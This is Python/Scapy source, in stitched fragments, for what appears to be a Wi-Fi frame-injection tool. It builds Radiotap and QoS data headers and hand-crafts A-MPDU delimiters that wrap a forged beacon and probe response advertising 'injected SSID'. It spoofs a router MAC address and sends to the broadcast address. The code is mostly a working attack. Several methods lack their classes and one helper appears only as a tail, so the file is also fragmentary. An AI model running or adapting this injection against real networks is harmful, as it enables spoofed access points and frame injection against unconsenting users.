def get_radiotap_header(self):
    """Build the fixed 18-byte Radiotap header that precedes injected frames.

    ``present`` names the fields carried (Flags, Rate, Channel,
    dBm_AntSignal, Antenna); ``notdecoded`` holds their raw values, with the
    channel frequency filled in from ``self.channel`` via ``get_frequency``.
    The surrounding bytes are kept verbatim from the original layout.
    """
    present_fields = 'Flags+Rate+Channel+dBm_AntSignal+Antenna'
    freq = get_frequency(self.channel)
    raw_fields = '\x00\x6c' + freq + '\xc0\x00\xc0\x01\x00\x00'
    return RadioTap(len=18, present=present_fields, notdecoded=raw_fields)
def __init__(self, recv_mac, trans_mac, dst_mac):
    """Prepare a Radiotap + 802.11 Data header pair for the given addresses.

    Args:
        recv_mac: receiver address (addr1).
        trans_mac: transmitter address (addr2).
        dst_mac: destination address (addr3).
    """
    self.recv_mac = recv_mac
    self.trans_mac = trans_mac
    self.dst_mac = dst_mac

    freq = get_frequency(CHANNEL)
    self.rt = RadioTap(
        len=18,
        present='Flags+Rate+Channel+dBm_AntSignal+Antenna',
        notdecoded='\x00\x6c' + freq + '\xc0\x00\xc0\x01\x00\x00',
    )
    # Plain (non-QoS) data frame with a fixed sequence-control word;
    # FCfield=0x01 is presumably the To-DS flag (see the 'ds' parameter
    # used by the sibling classes).
    self.dot11hdr = Dot11(
        type="Data",
        subtype=DOT11_SUBTYPE_DATA,
        addr1=recv_mac,
        addr2=trans_mac,
        addr3=dst_mac,
        SC=0x3060,
        FCfield=0x01,
    )
    self.data = self.rt / self.dot11hdr
def __init__(self, recv_mac, src_mac, dst_mac, ds=0x01):
    """Prepare a Radiotap + QoS Data header for an aggregate of subframes.

    Args:
        recv_mac: receiver address (addr1).
        src_mac: source address (addr2).
        dst_mac: destination address (addr3).
        ds: value for the Frame Control flags field (to/from-DS bits).
    """
    self.recv_mac = recv_mac
    self.src_mac = src_mac
    self.dst_mac = dst_mac
    self.num_subframes = 0  # no subframes appended yet

    freq = get_frequency(CHANNEL)
    self.rt = RadioTap(
        len=18,
        present='Flags+Rate+Channel+dBm_AntSignal+Antenna',
        notdecoded='\x00\x6c' + freq + '\xc0\x00\xc0\x01\x00\x00',
    )
    # QoS Data header followed by a two-byte raw payload (0x80 0x00),
    # presumably the QoS Control field; kept verbatim.
    qos_hdr = Dot11(
        type="Data",
        subtype=DOT11_SUBTYPE_QOS_DATA,
        addr1=recv_mac,
        addr2=src_mac,
        addr3=dst_mac,
        SC=0x3060,
        FCfield=ds,
    )
    self.dot11hdr = qos_hdr / Raw("\x80\x00")
    self.data = self.rt / self.dot11hdr
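def ssid_packet():
    """Return the raw bytes of a beacon frame wrapped as one A-MPDU subframe.

    The beacon advertises SSID "injected SSID" from an all-zero AP address
    on CHANNEL.  The MPDU is preceded by a 4-byte delimiter (length field,
    CRC-8 of that field, signature 0x4E), followed by the frame CRC from
    ``dot11crc`` and zero padding to a 4-octet boundary, and trailed by
    eight 4-byte fillers ending in the 0x4E signature.

    Returns:
        The serialized frame as a ``str``.
    """
    ap_mac = '00:00:00:00:00:00'
    beacon_packet = (
        Dot11(subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=ap_mac, addr3=ap_mac)
        / Dot11Beacon(cap=0x2105)
        / Dot11Elt(ID='SSID', info="injected SSID")
        / Dot11Elt(ID='Rates', info=AP_RATES)
        / Dot11Elt(ID='DSset', info=chr(CHANNEL))
    )
    beacon_packet.SC = 0x3060  # fixed sequence-control word
    # NOTE(review): time.time() is a float; confirm the timestamp field
    # accepts a non-integer before relying on this value.
    beacon_packet[Dot11Beacon].timestamp = time.time()

    # MPDU length counts the 4-byte CRC appended below.
    mpdu_len = len(beacon_packet) + 4
    padding = "\x00" * (-mpdu_len % 4)  # align the subframe to 4 octets
    # Length is shifted so it occupies the upper bits of the 16-bit
    # delimiter word; the low 4 bits stay clear.
    mpdu_len <<= 4
    # CRC-8 (polynomial 0x07, reflected, xorOut 0xFF) over the length word.
    crc_fun = crcmod.mkCrcFun(0b100000111, rev=True, initCrc=0x00, xorOut=0xFF)
    crc = crc_fun(struct.pack('<H', mpdu_len))
    maccrc = dot11crc(str(beacon_packet))
    delim_sig = 0x4E
    ampdu_header = struct.pack('<HBB', mpdu_len, crc, delim_sig)

    data = ampdu_header / beacon_packet / maccrc / padding
    data /= "\x00\x00\x20\x4e" * 8  # trailing fillers, presumably null delimiters
    return str(data)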
def __init__(self, recv_mac, src_mac, dst_mac, ds=0x01):
    """Prepare the Radiotap header and a QoS Data header template.

    Only the Radiotap header is placed in ``self.data`` here; the 802.11
    header is built and stored separately so it can be appended later.

    Args:
        recv_mac: receiver address (addr1).
        src_mac: source address (addr2).
        dst_mac: destination address (addr3).
        ds: value for the Frame Control flags field (to/from-DS bits).
    """
    self.recv_mac = recv_mac
    self.src_mac = src_mac
    self.dst_mac = dst_mac
    self.num_subframes = 0  # no subframes appended yet

    # An MCS-bearing variant of this header ('...+Antenna+MCS') was tried
    # by the author and abandoned; this is the original field set.
    freq = get_frequency(CHANNEL)
    self.rt = RadioTap(
        len=18,
        present='Flags+Rate+Channel+dBm_AntSignal+Antenna',
        notdecoded='\x00\x6c' + freq + '\xc0\x00\xc0\x01\x00\x00',
    )
    qos_hdr = Dot11(
        type="Data",
        subtype=DOT11_SUBTYPE_QOS_DATA,
        addr1=recv_mac,
        addr2=src_mac,
        addr3=dst_mac,
        SC=0x3060,
        FCfield=ds,
    )
    # Two zero bytes follow the header, presumably the QoS Control field.
    self.dot11hdr = qos_hdr / Raw("\x00\x00")
    # Start with just the Radiotap header; remaining headers are added later.
    self.data = self.rt
# NOTE(review): the next three statements are the tail of a CRC helper whose
# ``def`` line lies above this excerpt; ``crc_fun`` and ``pkt`` presumably
# come from that enclosing function.
    crc_fun.update(str(pkt))
    crc = struct.pack('<I', crc_fun.crcValue)  # little-endian 32-bit CRC value
    return crc

# --- module-level configuration --------------------------------------------
interface = 'mon0'  # presumably a monitor-mode interface; confirm on the host
own_mac = get_if_raw_hwaddr(interface)[1]
src_mac = own_mac
dst_mac = 'ff:ff:ff:ff:ff:ff'
#dst_mac = 'c0:ee:fb:00:00:00' # OnePlus?
#dst_mac = '00:1c:10:00:00:00' # Linksys router
# NOTE: this reassignment overrides ``src_mac = own_mac`` above, so the
# interface's own address is not the one placed in the frames.
src_mac = '00:1c:10:00:00:00' # Linksys router
channel = 1
sequence_number = 0  # last value handed out by next_sc(); wraps at 4096
# Radiotap header with the channel frequency filled in from ``channel``.
rt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\x00\x6c' + get_frequency(channel) + '\xc0\x00\xc0\x01\x00\x00')

def next_sc():
    """Advance the global sequence counter and return it as an SC field value.

    The counter wraps at 4096 and the result is multiplied by 16 (a 4-bit
    left shift), presumably so the sequence number lands in the upper bits
    of the Sequence Control word with the fragment-number bits left zero.
    """
    global sequence_number
    sequence_number = (sequence_number + 1) % 4096
    return sequence_number*16

# Template, xx = length
#pkt = Dot11(type=0, subtype=13, addr1=dst_mac, addr2=src_mac, addr3=src_mac, SC=0, FCfield='from-DS') \
#    / "\x00\x00\x01\x26\xx\x00\x0e\x00"

# Radio measurement
# --------------------------------------------------
#pkt = Dot11(type=0, subtype=13, addr1=dst_mac, addr2=src_mac, addr3=src_mac, SC=0, FCfield=0) \
#    / "\x00\x00\x01\x26\x0e\x00\x0e\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff"
def get_radiotap_header(self):
    """Return the 18-byte Radiotap header for frames on ``self.channel``.

    The ``present`` bitmap names Flags, Rate, Channel, dBm_AntSignal and
    Antenna; ``notdecoded`` supplies their raw bytes, with only the channel
    frequency (from ``get_frequency``) varying between instances.
    """
    fields = {
        'len': 18,
        'present': 'Flags+Rate+Channel+dBm_AntSignal+Antenna',
        'notdecoded': ''.join([
            '\x00\x6c',
            get_frequency(self.channel),
            '\xc0\x00\xc0\x01\x00\x00',
        ]),
    }
    return RadioTap(**fields)
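def probe_response():
    """Return the raw bytes of a probe response wrapped as one A-MPDU subframe.

    The response advertises SSID "injected SSID" from be:da:de:ad:be:ef to the
    broadcast address.  The MPDU is preceded by a 4-byte delimiter (length
    field, CRC-8 of that field, signature 0x4E), followed by the frame CRC
    from ``dot11crc`` and zero padding to a 4-octet boundary, and trailed by
    eight 4-byte fillers ending in the 0x4E signature.

    Returns:
        The serialized frame as a ``str``.
    """
    ap_mac = "be:da:de:ad:be:ef"
    # NOTE(review): time.time() is a float; confirm the timestamp field
    # accepts a non-integer before relying on this value.
    # NOTE(review): DSset is hard-coded to channel 1 while the sibling
    # ssid_packet() uses chr(CHANNEL); confirm whether the mismatch is intended.
    beacon_packet = (
        Dot11(subtype=5, addr1='ff:ff:ff:ff:ff:ff', addr2=ap_mac, addr3=ap_mac, SC=0x3060)
        / Dot11ProbeResp(timestamp=time.time(), beacon_interval=0x0064, cap=0x2104)
        / Dot11Elt(ID='SSID', info="injected SSID")
        / Dot11Elt(ID='Rates', info=AP_RATES)
        / Dot11Elt(ID='DSset', info=chr(1))
    )

    # MPDU length counts the 4-byte CRC appended below.
    mpdu_len = len(beacon_packet) + 4
    padding = "\x00" * (-mpdu_len % 4)  # align the subframe to 4 octets
    # Length is shifted so it occupies the upper bits of the 16-bit
    # delimiter word; the low 4 bits stay clear.
    mpdu_len <<= 4
    # CRC-8 (polynomial 0x07, reflected, xorOut 0xFF) over the length word.
    crc_fun = crcmod.mkCrcFun(0b100000111, rev=True, initCrc=0x00, xorOut=0xFF)
    crc = crc_fun(struct.pack('<H', mpdu_len))
    maccrc = dot11crc(str(beacon_packet))
    delim_sig = 0x4E
    ampdu_header = struct.pack('<HBB', mpdu_len, crc, delim_sig)

    data = ampdu_header / beacon_packet / maccrc / padding
    data /= "\x00\x00\x20\x4e" * 8  # trailing fillers, presumably null delimiters
    return str(data)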